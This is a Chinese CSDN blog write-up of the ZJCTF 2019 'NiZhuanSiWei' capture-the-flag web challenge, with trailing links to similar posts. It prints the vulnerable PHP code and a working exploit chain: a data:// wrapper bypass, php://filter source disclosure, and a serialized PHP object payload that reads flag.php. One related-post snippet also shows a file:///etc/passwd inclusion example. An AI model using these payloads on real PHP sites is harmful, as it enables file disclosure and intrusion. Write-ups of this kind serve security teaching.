[ZJCTF 2019]NiZhuanSiWei

最新推荐文章于 2023-01-27 23:01:37 发布
最新推荐文章于 2023-01-27 23:01:37 发布
阅读量78 收藏
点赞数
分类专栏: CTF 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45694932/article/details/120202006
版权

1.data伪协议写入文件
2.php://filter 读取文件
3.反序列化

<?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>

第一个绕过
在这里插入图片描述
file_get_contents() 把整个文件读取到字符串中,所以这里需要传入一个文件,可以利用php://input伪协议在以POST形式传入“ welcome to the zjctf " 也可以用data伪协议传参

http://48fbc710-a16d-4601-95dd-64483d286fbb.node4.buuoj.cn:81/?text=data:text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

第二个绕过

在这里插入图片描述

正则过滤了flag关键字,因此无法直接读取flag,我们可以看到提示useless.php我们可以先读取useless.php
php://filter/read=convert.base64-encode/resource=useless.php

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

第三个绕过

在这里插入图片描述

反序列化,file传入的是useless 通过useless.php里new 一个Flag对象 来调用__toString() 是魔术方法的一种,具体用途是当一个对象被当作字符串对待的时候,会触发这个魔术方法

根据源代码获取序列化结果

class Flag{  //flag.php  
    public $file="flag.php";  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}
$a=new Flag();
echo serialize($a);
?>

O:4:“Flag”:1:{s:4:“file”;s:8:“flag.php”;}

payload:http://48fbc710-a16d-4601-95dd-64483d286fbb.node4.buuoj.cn:81/?text=data:text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

flag 在源代码中

cop_g
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ZJCTF 2019]NiZhuanSiWei【超详细讲解】
wo41ge的博客
11-15 3909
进入题目链接 这是源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1>
BUUCTF [ZJCTF 2019]NiZhuanSiWei
m0_49025459的博客
05-02 551
进去就是源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1>&l
每天一道ctf
whisper921的博客
11-13 858
构造:data://text/plain,welcome to the zjctf,为了绕过某些过滤,这里用到base64编码。然后有一个可控参数file,构造file=useless.php,但是针对php文件我们需要进行base64编码,否则读取不到其内容,所以构造payload:file=php://filter/read=convert.base64-encode/resource=useless.php。结果为:O:4:"Flag":1:{s:4:"file";
[ZJCTF 2019]NiZhuanSiWei 1
m0_62879498的博客
04-27 577
[ZJCTF 2019]NiZhuanSiWei 1 进入环境,得到源代码 观察源代码,发现: 我们需要绕过两个点 首先是 get传参 ,让text=welcome to the zjctf 在这里我们需要用到 php的伪协议 data:// data:// — 数据流读写 条件:allow_url_fopen=on;allow_url_include=on 作用:作为一个封装器对进行数据流读写 使用格式:data://text/plain,[code] eg: data://text/plain,
NSSCTF-Web安全入门-wp
网安小菜鸡
01-27 3263
NSSCTF-Web安全入门-wp
BUUCTF [ZJCTF 2019]NiZhuanSiWei1
biggerpig的博客
09-25 967
BUUCTF web类型题目[ZJCTF 2019]NiZhuanSiWei1详解
BUUCTF-PWN-[ZJCTF 2019]Login
最新发布
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
buu-web:[ZJCTF 2019]NiZhuanSiWei
weixin_53146913的博客
04-09 344
源码: <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></b
BUUCTF Web2
ookami6497的博客
12-12 615
CTF系列】攻防世界-nizhuansiwei
读万卷书,行万里路。
03-02 526
文章目录1 file_get_content2 include3 反序列化 相关信息: hint:无 进入网站后,便能显示源码,是一道代码审计题目。 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; // text 需要等于 welcome if(isset($text)&&(file_get_contents($text,'r')==="welcome to
BUUCTF-NiZhuanSiWei
m0_47571887的博客
11-08 1097
打开题目 第一个if是让我们提交text值,text不为空,并且file_open_concents的返回值为'welcometothezjctf',但这text是个变量,这里就需要用到php://input协议,以POST方式提交'welcometothezjctf'。 第二个if是过滤了flag,如果检测flag,则返回"Not now",这里还发现了一个文件包含。 先将useless.php拖拽下来。 ?text=php://input&file=php://fil...
【BUUCTF】[ZJCTF 2019]NiZhuanSiWei
aoao331198的博客
04-08 997
源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br&g
buuctf [ZJCTF 2019]NiZhuanSiWei
SopRomeo的博客
03-15 1226
给了一段源码,注释如下 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ //判断$text变量是否...
20210218CTF伪协议绕过file_get_contents(bugkuctf的web21御结冰城感想)
热门推荐
qq_45290991的博客
02-18 1万+
CTF中常用的php伪协议利用 </h1> <div class="clear"></div> <div class="postBody"> file://# 作用: 用于访问文件(绝对路径、相对路径、网络路径) 示例: http://www.xx.com?file=file:///etc/passswd ph...
ctf (NiZhuanSiWei)
Glacier_Mount的博客
06-27 350
这是一道简单的web题涉及data://伪协议、php伪协议和反序列化的简单应用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值